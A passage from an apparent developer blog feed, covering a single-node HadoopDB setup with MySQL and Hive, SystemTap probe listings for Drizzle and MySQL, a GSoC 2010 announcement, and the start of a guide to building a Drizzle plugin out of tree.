&lt;script src=&quot;http://gist.github.com/394770.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Notice the reference to the HadoopDB XML file. We will cover that later but it is necessary for
using HadoopDB to have that property in your configuration.
&lt;br&gt;

Next, we need to modify the $HADOOP_CONF/hadoop-env.sh file so that the JAVA_HOME variable is
correctly set in that file. Thus, I have the following 2 lines in my hadoop-env.sh file:

&lt;pre&gt;
# The java implementation to use.  Required.
export JAVA_HOME=/usr/lib/jvm/java-6-openjdk
&lt;/pre&gt;

Next, we need to format the Hadoop filesystem:

&lt;pre&gt;
$ hadoop namenode -format
10/05/07 14:24:12 INFO namenode.NameNode: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting NameNode
STARTUP_MSG:   host = hadoop1/127.0.1.1
STARTUP_MSG:   args = [-format]
STARTUP_MSG:   version = 0.20.2
STARTUP_MSG:   build = https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r
911707; compiled by 'chrisdo' on Fri Feb 19 08:07:34 UTC 2010
************************************************************/
10/05/07 14:24:12 INFO namenode.FSNamesystem: fsOwner=hadoop,hadoop
10/05/07 14:24:12 INFO namenode.FSNamesystem: supergroup=supergroup
10/05/07 14:24:12 INFO namenode.FSNamesystem: isPermissionEnabled=true
10/05/07 14:24:12 INFO common.Storage: Image file of size 96 saved in 0 seconds.
10/05/07 14:24:12 INFO common.Storage: Storage directory /opt/hadoop-data/tmp-base/dfs/name has been
successfully formatted.
10/05/07 14:24:12 INFO namenode.NameNode: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down NameNode at hadoop1/127.0.1.1
************************************************************/
$
&lt;/pre&gt;

The above is the output from a successful format. Now, we can finally start our single-node Hadoop
installation:

&lt;pre&gt;
$ start-all.sh
starting namenode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-namenode-hadoop1.out
localhost: starting datanode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-datanode-hadoop1.out
localhost: starting secondarynamenode, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-hadoop1.out
starting jobtracker, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-jobtracker-hadoop1.out
localhost: starting tasktracker, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-tasktracker-hadoop1.out
$
&lt;/pre&gt;

Again, if you don't see output similar to the above, something went wrong. The log files under
/opt/hadoop/logs are quite helpful for trouble-shooting.

&lt;h2&gt;Installing MySQL&lt;/h2&gt;

Installing MySQL is quite simple on Ubuntu. I went with the MySQL Server package:

&lt;pre&gt;
sudo apt-get install mysql-server
&lt;/pre&gt;

We don't need to perform any special configuration of MySQL for HadoopDB. Just make sure to take
note of what password you specify for the root user since we will perform all work with HadoopDB as
the root user (this is not mandatory but what I did to keep things simple).
&lt;br&gt;

Next, we need to install the MySQL JDBC driver. For this article, I used &lt;a
href=&quot;http://www.mysql.com/downloads/connector/j/&quot;&gt;Connector J&lt;/a&gt;. After downloading the jar file,
we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp mysql-connector-java-5.1.12-bin.jar $HADOOP_HOME/lib
&lt;/pre&gt;

Its worth noting that in the paper, the authors do say that initially they used MySQL with HadoopDB
but switched to PostgreSQL. The main reason cited is due to the poor join algorithms in MySQL which
I assume to mean the fact that only nested loop join is supported in MySQL. I don't attempt to make
any comparison of HadoopDB running with MySQL versus PostgreSQL but I wanted to point out the
authors observation.

&lt;h2&gt;Download HadoopDB&lt;/h2&gt;

Now we can download HadoopDB. I'm going to download both the jar file and check out the source from
Subversion:
Now we can &lt;a href=&quot;http://sourceforge.net/projects/hadoopdb/files/&quot;&gt;download&lt;/a&gt; HadoopDB. After
downloading the jar file, we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp hadoopdb.jar $HADOOP_HOME/lib
&lt;/pre&gt;

I also checked out the source code from Subversion in case I needed to re-build the jar file at any
time:

&lt;pre&gt;
vn co https://hadoopdb.svn.sourceforge.net/svnroot/hadoopdb hadoopdb
&lt;/pre&gt;

&lt;h2&gt;Install Hive&lt;/h2&gt;

&lt;a href=&quot;http://wiki.apache.org/hadoop/Hive&quot;&gt;Hive&lt;/a&gt; is used by HadoopDB as a SQL interface to
their system. Its not a requirement for working with HadoopDB but it is another way to interact with
HadoopDB so I'll cover how to install it.
&lt;br&gt;

First, we need to create directories in HDFS:

&lt;pre&gt;
hadoop fs -mkdir /tmp
hadoop fs -mkdir /user/hive/warehouse
hadoop fs -chmod g+w /tmp
hadoop fs -chmod g+w /user/hive/warehouse
&lt;/pre&gt;

Next, we need to &lt;a href=&quot;http://sourceforge.net/projects/hadoopdb/files/&quot;&gt;download&lt;/a&gt; the
SMS_dist tar file from the HadoopDB download page:

&lt;pre&gt;
tar zxvf SMS_dist.tar.gz
sudo mv dist /opt/hive
sudo chown -R hadoop:hadoop hive
&lt;/pre&gt;

Since we already setup the environment variables related to Hive earlier when we were installing
Hadoop, everything we need should now be in our path:

&lt;pre&gt;
$ hive
Hive history file=/tmp/hadoop/hive_job_log_hadoop_201005081717_1990651345.txt
hive&gt; 

create     describe   exit       from       load       quit       set
hive&gt; quit;
$
&lt;/pre&gt;

&lt;h2&gt;Data&lt;/h2&gt;

We want to some data to play around with for testing purposes. For this article, I'm going to use
the data from the &lt;a href=&quot;http://database.cs.brown.edu/projects/mapreduce-vs-dbms/&quot;&gt;paper&lt;/a&gt;
published last summer: 'A Comparison of Approaches to Large-Scale Data Analysis'. Documentation on
how to re-produce the benchmarks in that paper are prodivded in the link I gave to the paper. For
this article, since I'm only running one Hadoop node and have absolutely no interest in generating
lots of data I modified the scripts provided to produce tiny amounts of data:

&lt;pre&gt;
svn co http://graffiti.cs.brown.edu/svn/benchmarks/
cd benchmarks/datagen/teragen
&lt;/pre&gt;

Within the benchmarks/datagen/teragen folder, there is a Perl script named teragen.pl that is
reponsible for the generation of data. I modified that script for my purposes to look like:

&lt;script src=&quot;http://gist.github.com/394790.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We then run the above Perl script to generate data that will be loaded in to HDFS. HadoopDB comes
with a data partitioner that can partition data into a specified number of partitions. This is not
particularly important for this article since we are running a single-node cluster so we only have 1
partition. The idea is that a separate partition can be bulk-loaded into a separate database node
and indexed appropriately. 

For us, we just need to create a database and table in our MySQL database. Since we only have 1
partition, the database name will reflect that. The procedure to load the data set we generated into
our single MySQL node is:

&lt;pre&gt;
hadoop fs -get /data/SortGrep535MB/part-00000 my_file
mysql -u root -ppassword
mysql&gt; create database grep0;
mysql&gt; use grep0;
mysql&gt; create table grep (
    -&gt;   key1 char(10),
    -&gt;   field char(90)
    -&gt; );
load data local infile 'my_file' into table grep fields terminated by '|' (key1, field);
&lt;/pre&gt;

We now have data loaded into both HDFS and MySQL. The data we are working with is from the grep
benchmark which is not the best benchmark for HadoopDB since it is un-structured data. However,
since this article is just about how to setup HadoopDB and not testing its preformance, I didn't
really worry about that much.

&lt;h2&gt;HadoopDB Catalog and Running a Job&lt;/h2&gt;

The HadoopDB catalog is stored as an XML in HDFS. A tool is provided that generates this XML file
from a properties file. For this article, the properties file I used is:

&lt;script src=&quot;http://gist.github.com/394798.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The machines.txt file must exist and for this article, my machines.txt file had only 1 entry:
localhost
&lt;br&gt;

Then in order to generate the XML file and store it in HDFS, the following is performed:

&lt;pre&gt;
java -cp $HADOOP_HOME/lib/hadoopdb.jar edu.yale.cs.hadoopdb.catalog.SimpleCatalogGenerator \
&gt; Catalog.properties
hadoop dfs -put HadoopDB.xml HadoopDB.xml
&lt;/pre&gt;

Please not that the above tool is quite fragile and expects the input properties file to be in a
certain format with certain fields. Its pretty easy to break the tool which is understandable given
this is a research project.
&lt;br&gt;

We are now ready to run a HadoopDB job! The HadoopDB distribution comes with a bunch of benchmarks
that were used in the paper that was published on HadoopDB. The data I generated in this article
corresponds to the data that was used for their benchmarks so I can use jobs that have already been
written in order to test my setup. 
&lt;br&gt;

I'm using the grep task from the paper to search for a pattern in the data I loaded earlier. Thus,
to kick off a job I do:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
&lt;/pre&gt;

Running the job, I see output like the following:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
10/05/08 18:01:41 INFO exec.DBJobBase: grep_db_job
10/05/08 18:01:41 INFO exec.DBJobBase: SELECT key1, field FROM grep WHERE field LIKE '%%wo%%';
10/05/08 18:01:41 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker,
sessionId=
10/05/08 18:01:41 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments.
Applications should implement Tool for the same.
10/05/08 18:01:41 INFO mapred.JobClient: Running job: job_local_0001
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Data locality failed for
hadoop1.localdomain
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Task from hadoop1.localdomain is connecting
to chunk 0 on host localhost with db url jdbc:mysql://localhost:3306/grep0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: SELECT key1, field FROM grep WHERE field
LIKE '%%wo%%';
10/05/08 18:01:41 INFO mapred.MapTask: numReduceTasks: 0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: DB times (ms): connection = 245, query
execution = 2, row retrieval  = 36
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Rows retrieved = 3
10/05/08 18:01:41 INFO mapred.TaskRunner: Task:attempt_local_0001_m_000000_0 is done. And is in the
process of commiting
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task attempt_local_0001_m_000000_0 is allowed to commit
now
10/05/08 18:01:41 INFO mapred.FileOutputCommitter: Saved output of task
'attempt_local_0001_m_000000_0' to file:/home/hadoop/padraig
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task 'attempt_local_0001_m_000000_0' done.
10/05/08 18:01:42 INFO mapred.JobClient:  map 100% reduce 0%
10/05/08 18:01:42 INFO mapred.JobClient: Job complete: job_local_0001
10/05/08 18:01:42 INFO mapred.JobClient: Counters: 6
10/05/08 18:01:42 INFO mapred.JobClient:   FileSystemCounters
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_READ=115486
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_WRITTEN=130574
10/05/08 18:01:42 INFO mapred.JobClient:   Map-Reduce Framework
10/05/08 18:01:42 INFO mapred.JobClient:     Map input records=3
10/05/08 18:01:42 INFO mapred.JobClient:     Spilled Records=0
10/05/08 18:01:42 INFO mapred.JobClient:     Map input bytes=3
10/05/08 18:01:42 INFO mapred.JobClient:     Map output records=3
10/05/08 18:01:42 INFO exec.DBJobBase: 
grep_db_job JOB TIME : 1747 ms.

$
&lt;/pre&gt;

The results are stored in HDFS and I also specified I wanted the results put in an output directory
named padraig. Inspecting the results I see:

&lt;pre&gt;
$ cd padraig
$ cat part-00000
~k~MuMq=	w0000000000{XSq#Bq6,3xd.tg_Wfa&quot;+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;
vkrvkB8	6i0000000000.h9RSz'&gt;Kfp6l~kE0FV&quot;aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA
]&amp;{`H%]1{E0000000000Z[@egp'h9!	BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7
$
&lt;/pre&gt;

I can verify this result by going the data stored in MySQL and performing the same query on it:

&lt;pre&gt;
mysql&gt; select key1, field from grep where field like '%wo%';
+--------------------------------+------------------------------------------------------------------------------------------+
| key1                           | field
|
+--------------------------------+------------------------------------------------------------------------------------------+
| ~k~MuMq=                       | w0000000000{XSq#Bq6,3xd.tg_Wfa&quot;+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;                             |
| vkrvkB8                        | 6i0000000000.h9RSz'&gt;Kfp6l~kE0FV&quot;aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA |
| ]&amp;{`H%]1{E0000000000Z[@egp'h9! | BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7                            |
+--------------------------------+------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql&gt;
&lt;/pre&gt;

Thus, I can see the same rows were returned by the HadoopDB job.

&lt;h2&gt;Conclusion&lt;/h2&gt;

I didn't get to use the Hive interface to HadoopDB as I had issues getting it going. If I get it
going in the future, I'll likely write about it. HadoopDB is a pretty interesting project and I
enjoyed reading the paper on it a lot. A &lt;a
href=&quot;http://cs-www.cs.yale.edu/homes/dna/papers/hadoopdb-demo.pdf&quot;&gt;demo&lt;/a&gt; of HadoopDB will be
given at SIGMOD this year which should be interesting.
&lt;br&gt;

Overall, I think its a pretty interesting project but I'm not sure how active it is. Based on the
fact that a demo is being given at SIGMOD, I'm sure there is research being done on it but compared
to other open source projects its difficult to tell how much development is occuring. I'm sure this
has more to do with the fact that it is a research project first and foremost whose source code just
happens to be available. It would be nice to see a mailing list or something pop up around this
project though. For example, if I wanted to contribute a patch, its not really clear how I should go
about doing that and whether it will be integrated or not. 
&lt;br&gt;

I do think its some interesting research
though and I'll be keeping my eye on it and trying to mess around with it whenever I have spare
time. Next thing I want to look into regarding HadoopDB is hooking it up to the column-orientated
database &lt;a href=&quot;http://monetdb.cwi.nl/&quot;&gt;MonetDB&lt;/a&gt; which I will write about if I get the chance.
</content>
 </entry>
 
 <entry>
   <title>Configuring Drizzle/MySQL for use with SystemTap</title>
   <link href="http://posulliv.github.com/2010/04/02/drizzle-mysql-stap"/>
   <updated>2010-04-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/04/02/drizzle-mysql-stap</id>
   <content type="html">In a &lt;a href=&quot;http://posulliv.github.com/2010/02/26/installing-stap.html&quot;&gt;previous&lt;/a&gt; post, I went
through the steps involved to install SystemTap on a Linux box. Now, I'd like to show how to
configure drizzle and MySQL for use with SystemTap.&lt;br&gt;

First, of all, you need to make sure the dtrace python script that is used by SystemTap is in your
path. If it is not, then if you are on Ubuntu you need to install the systemtap-sdt-dev package as
mentioned in my last post. Assuming our system is setup correctly, we can build drizzle as follows:

&lt;pre&gt;
$ bzr branch lp:drizzle stap
$ cd stap
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make
&lt;/pre&gt;

The drizzle binary will now have support for static stap probes. In order to verify this and see
what probes are present in drizzle, lets start a drizzle server and list the probes in the server
process:

&lt;pre&gt;
$ cd tests
$ ./dtr --start-and-exit
$ sudo stap -l 'process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;*&quot;)'
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__rdlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__wrlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__unlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__rdlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__wrlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__unlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;connection__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;filesort__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;filesort__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__opt__choose__plan__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__opt__choose__plan__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;connection__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__select__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;command__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;command__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__exec__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__exec__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__parse__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__parse__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;select__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;select__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__select__start&quot;)
$
&lt;/pre&gt;

The argument to your process function should be the path to your drizzle binary.

The process for MySQL is very similar. I'm going to just list the build commands and show the probes
that are present in MySQL:

&lt;pre&gt;
$ bzr branch lp:mysql-server mysql-stap
$ cd mysql-stap
$ ./BUILD/autogen.sh
$ ./configure --enable-dtrace
$ make
$ cd mysql-test
$ ./mtr --start &amp;
$ sudo stap -l 'process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;*&quot;)'
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__write__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__write__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__read__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__read__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;connection__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;connection__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__parse__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__parse__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__update__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__update__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__select__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__select__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__delete__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__delete__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__exec__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__exec__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;command__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;command__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;select__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;select__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;filesort__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;filesort__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__rdlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__wrlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__unlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__rdlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__wrlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__unlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__cache__hit&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__cache__miss&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;read__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;read__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;index__read__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;index__read__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__block&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__hit&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__miss&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__block&quot;)
$
&lt;/pre&gt;

You can see that there are probes in MySQL which would not make sense for Drizzle such as probes
related to the query cache and keycache. In Drizzle, we are also starting to add probes around the
optimizer but it is slow going.

That's it for now. I'll probably write a brief post next week demonstrating using these probes in
MySQL and Drizzle. I'll be covering more in my presentation at the MySQL user's conference in a few
weeks.
</content>
 </entry>
 
 <entry>
   <title>Drizzle Accepted for GSoC 2010</title>
   <link href="http://posulliv.github.com/2010/03/18/drizzle-soc"/>
   <updated>2010-03-18T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/03/18/drizzle-soc</id>
   <content type="html">I just found out today that Drizzle was accepted as its own project for Google's Summer of Code this
year. Our organization is listed &lt;a
href=&quot;http://socghop.appspot.com/gsoc/org/show/google/gsoc2010/drizzle&quot;&gt;here&lt;/a&gt;.&lt;br&gt; 

I'm acting as the program administrator for Drizzle this year with &lt;a href=&quot;http://oddments.org/&quot;&gt;Eric Day&lt;/a&gt; and I'm real excited about it. Last
year, I myself was a &lt;a
href=&quot;http://posulliv.github.com/2009/04/21/google-summer-of-code.html&quot;&gt;student in GSoC&lt;/a&gt; working on drizzle and I feel like I got a lot out of
that program so I really wanted to see Drizzle accepted as its own project this year. Hopefully,
we can get lots of students working with us this year.&lt;br&gt;

As someone who participated as a student and is now acting as a mentor, I can say that it is
probably the best summer job any student could get. Basically, you get paid to work on an
open-source project with awesome people and work from home. It can't really get much better if you
ask me.&lt;br&gt;

And any students interested in working on Drizzle should check out our ideas page on the &lt;a
href=&quot;http://drizzle.org/wiki/Soc&quot;&gt;wiki&lt;/a&gt;. 

</content>
 </entry>
 
 <entry>
   <title>Out of Tree Plugins in Drizzle</title>
   <link href="http://posulliv.github.com/2010/03/10/out-of-tree-plugin"/>
   <updated>2010-03-10T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/10/out-of-tree-plugin</id>
   <content type="html">This week I've been working on porting the prototype MySQL storage engine developed at &lt;a
href=&quot;http://akibainc.com&quot;&gt;Akiban&lt;/a&gt; to Drizzle. While doing this, I discovered that in Drizzle, it is
possible to build a plugin out of tree. When I say out of tree, I mean that I can develop a plugin
for drizzle and build it without having a copy of the drizzle source code. This is amazingly awesome
and is mostly due to the awesome build system that &lt;a href=&quot;http://inaugust.com/&quot;&gt;Monty&lt;/a&gt; has put together.
This build system is called &lt;a href=&quot;https://launchpad.net/pandora-build&quot;&gt;Pandora Build&lt;/a&gt; and if
you are ever working on a project that needs to use autoconf related tools, you should really check it out.
Its friggin awesome. It lets you concentrate on development instead of having to spend a bunch of
time trying to get a good build environment set up.&lt;br&gt;

Anyway, here I am going to go through an example of how to build a drizzle plugin out of tree. The
code is available at lp:~posulliv/drizzle/out-of-tree-example if anyone is interested in looking at
it. I am going to take an existing plugin in the drizzle source tree I developed and show how to
build it out of tree. The plugin I'm going to work with is the &lt;a
href=&quot;http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle.html&quot;&gt;memcached_stats&lt;/a&gt;
plugin.&lt;br&gt;

Before starting, its worth noting that Monty is working on creating a one-step tool for taking a
plugin that is currently in drizzle's source tree (that is, in the plugin directory of a drizzle
tree) and making it possible to build that plugin out of tree. His goal is that there need be no
changes in content between a directory that's in the drizzle source tree and one that's outside the
source tree.&lt;br&gt;

For this post, we will assume that we are working in a directory named mc-stats-plugin. Before
starting. this directory just contains source files. We will be adding all the build-related files
that are needed to build it.&lt;br&gt;

The first thing that is needed is a plugin.ini file for a plugin. For an out-of-tree plugin, a
name and url is required. Thus, the plugin.ini file for this plugin will look like:

&lt;pre&gt;
[plugin]
name=memcached_stats
title=Memcached Stats in DATA_DICTIONARY tables
description=Some DATA_DICTIONARY tables that provide Memcached stats
url=http://memcached.org/
version=0.1
disabled=yes
load_by_default=no
author=Padraig O Sullivan
license=PLUGIN_LICENSE_BSD
headers=stats_table.h analysis_table.h sysvar_holder.h
